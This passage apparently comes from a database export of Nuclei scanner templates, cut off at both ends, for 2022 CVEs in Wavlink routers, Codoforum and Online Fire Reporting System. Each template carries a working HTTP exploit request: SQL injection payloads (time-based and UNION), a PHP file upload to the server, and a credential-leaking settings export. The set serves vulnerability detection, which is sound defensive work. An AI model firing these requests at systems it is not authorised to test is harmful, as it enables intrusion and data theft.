https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31847\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31847\n cwe-id: CWE-425\n epss-score: 0.01285\n epss-percentile: 0.84308\n cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn579x3_firmware\n shodan-query: 
http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Login='\n - 'Password='\n - 'Model='\n - 'AuthMode='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202db1124164825b434395a0b2ed0eaadb8991a9b259a4aca81bd4c657793b8da0022100d3a817be0f73d3bf46078f8483bf8c513a3047485830b59564d7d136ce67632e:922c64590222798bb761d5b6d8e72950", "hash": "8b8529863425c0e9e497cd2e0d842053", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852d" }, "name": "CVE-2022-31854.yaml", "content": "id: CVE-2022-31854\n\ninfo:\n name: Codoforum 5.1 - Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: |\n Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. 
As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of Codoforum.\n reference:\n - https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip\n - https://codoforum.com\n - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31854\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31854\n cwe-id: CWE-434\n epss-score: 0.17108\n epss-percentile: 0.95958\n cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: codologic\n product: codoforum\n tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic\n\nhttp:\n - raw:\n - |\n POST /admin/?page=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n ------WebKitFormBoundaryACGPpj7UIqmtLNbB\n Content-Disposition: form-data; name=\"username\"\n\n {{username}}\n ------WebKitFormBoundaryACGPpj7UIqmtLNbB\n Content-Disposition: form-data; name=\"password\"\n\n {{password}}\n ------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n - |\n GET /admin/index.php?page=config HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/index.php?page=config HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA\n Content-Disposition: form-data; name=\"site_title\"\n\n\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA\n Content-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-httpd-php\n\n 
<?php\n\n echo md5('CVE-2022-31854');\n\n ?>\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA\n Content-Disposition: form-data; name=\"CSRF_token\"\n\n {{csrf}}\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n - |\n GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_4 == 200\n - contains(content_type_4, \"text/html\")\n - contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")\n condition: and\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>\n internal: true\n# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950", "hash": "7a0071f21c8eeb19042a8689bf55aa08", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852e" }, "name": "CVE-2022-31879.yaml", "content": "id: CVE-2022-31879\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat,j4vaovo\n severity: high\n description: |\n Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31879\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-31879\n cwe-id: CWE-89\n 
epss-score: 0.05519\n epss-percentile: 0.9247\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 15s\n GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 200 && status_code_2 == 200'\n - 'duration_2 - duration_1 >= 7'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"Dashboard\")'\n condition: and\n# digest: 490a0046304402200b95b388c981218ff2010a5af1002d6e6eccdcf8edf8a660ea9c6ce4483c07d20220773161e78dd1caf3ee58849de5a6107b7470729bdf71f8122d9bd4e60641cbe0:922c64590222798bb761d5b6d8e72950", "hash": "f4d11a37c12d84ebb8f837754dda15fe", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852f" }, "name": "CVE-2022-31974.yaml", "content": "id: CVE-2022-31974\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md\n - 
https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31974\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31974\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.85199\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\nvariables:\n num: '999999999'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cd024201d59f3b88ebf784aa61907ba5542a05e208b9e3de8c8bc7b30656f3c3022100f7aed5dfec5f88ed4297bc1f99e947e0c801b63bbf53a7dc7c1e655edb49ebac:922c64590222798bb761d5b6d8e72950", "hash": "13f3dc7136d354e348b70e75277a8674", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308530" }, "name": "CVE-2022-31975.yaml", "content": "id: CVE-2022-31975\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - 
https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31975\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31975\n cwe-id: CWE-89\n epss-score: 0.00834\n epss-percentile: 0.80157\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\nvariables:\n num: '999999999'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009910d6652352aff0eaac88c2b579c400a86a5f3ec6e122e5ac431a9d2f6079e2022100f750cb7ea36162240a1e8aef0aaebdc5a12c7e58e593b3b3ad12e780a227b3bc:922c64590222798bb761d5b6d8e72950", "hash": "569bb0a15862c5664df0ec97b6109698", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308531" }, "name": "CVE-2022-31976.yaml", "content": "id: CVE-2022-31976\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all 
user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31976\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31976\n cwe-id: CWE-89\n epss-score: 0.02036\n epss-percentile: 0.87769\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /classes/Master.php?f=delete_request HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\\\"}\")'\n condition: and\n# digest: 490a0046304402201c4e60b074ac073a47975a8d5098836fb4c229bc87513c05560b4e47c9b4a51d02201ce26a4554f2a66d0e4c8b00935d1587d66475498c0f538584c8099e981a9a46:922c64590222798bb761d5b6d8e72950", "hash": "142b185a6f130c7d578f5e23649386cf", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308532" }, "name": "CVE-2022-31977.yaml", "content": "id: CVE-2022-31977\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.\n impact: |\n Successful exploitation of this 
vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-3.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31977\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31977\n cwe-id: CWE-89\n epss-score: 0.01192\n epss-percentile: 0.83594\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /classes/Master.php?f=delete_team HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\\\"}\")'\n condition: and\n# digest: 4a0a00473045022100a3ea459a9ffb2cfecef3b00300e5e65a75669bec415a481218447c92d129345402203e0b8a16ac80e4fb7948d2c418a4745685d3d2b8b3e29760b858effcf3b864e6:922c64590222798bb761d5b6d8e72950", "hash": "03f38d556b5afb9a3d82dc00d652f7de", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308533" }, "name": "CVE-2022-31978.yaml", "content": "id: CVE-2022-31978\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n Online Fire Reporting 
System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-5.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31978\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31978\n cwe-id: CWE-89\n epss-score: 0.02031\n epss-percentile: 0.88685\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /classes/Master.php?f=delete_inquiry HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\")'\n condition: and\n# digest: 4b0a0048304602210082920a5d3562240e8e93e567926bda08298baef90f3839368b24000a172d9c4f022100d9c68292bb99fd7bd81974408e1931f6f60e746db4fb80eac1150e70edb76316:922c64590222798bb761d5b6d8e72950", "hash": "7eed65e9006ec3a0799de7d5a4c5e58a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308534" }, "name": 
"CVE-2022-31980.yaml", "content": "id: CVE-2022-31980\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31980\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31980\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.85199\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Control Teams\")'\n condition: and\n# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950", "hash": 
"5378637b2218784e5f64b6e29b339e21", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308535" }, "name": "CVE-2022-31981.yaml", "content": "id: CVE-2022-31981\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31981\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31981\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Control Teams\")'\n condition: and\n# digest: 
4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950", "hash": "cde93c80d1227f7b74ca16558eeae58c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308536" }, "name": "CVE-2022-31982.yaml", "content": "id: CVE-2022-31982\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31982\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31982\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Request 
Detail\")'\n condition: and\n# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950", "hash": "9293b2109f097ebc696aa286b2c2b7a7", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308537" }, "name": "CVE-2022-31983.yaml", "content": "id: CVE-2022-31983\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31983\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31983\n cwe-id: CWE-89\n epss-score: 0.00834\n epss-percentile: 0.80157\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n 
dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Request Detail\")'\n condition: and\n# digest: 4a0a00473045022100dda1b407e3946a8d08dfe8a4da98bf95b77bfae535eb9499bc7f8d5cb0a06d740220401b92b24b02946161684222dbac0c6812a97c86916ab5ccdaffcd491809fcde:922c64590222798bb761d5b6d8e72950", "hash": "3b473c28e2d72f2a564245d754ff6584", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308538" }, "name": "CVE-2022-31984.yaml", "content": "id: CVE-2022-31984\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.\n remediation: |\n To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31984\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31984\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project\nvariables:\n num: '999999999'\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950", "hash": "04b23d2b0d3066fbf97aec15cc0f6393", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308539" }, "name": "CVE-2022-32007.yaml", "content": "id: CVE-2022-32007\n\ninfo:\n name: Complete Online Job Search System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32007\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32007\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.85199\n cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: 
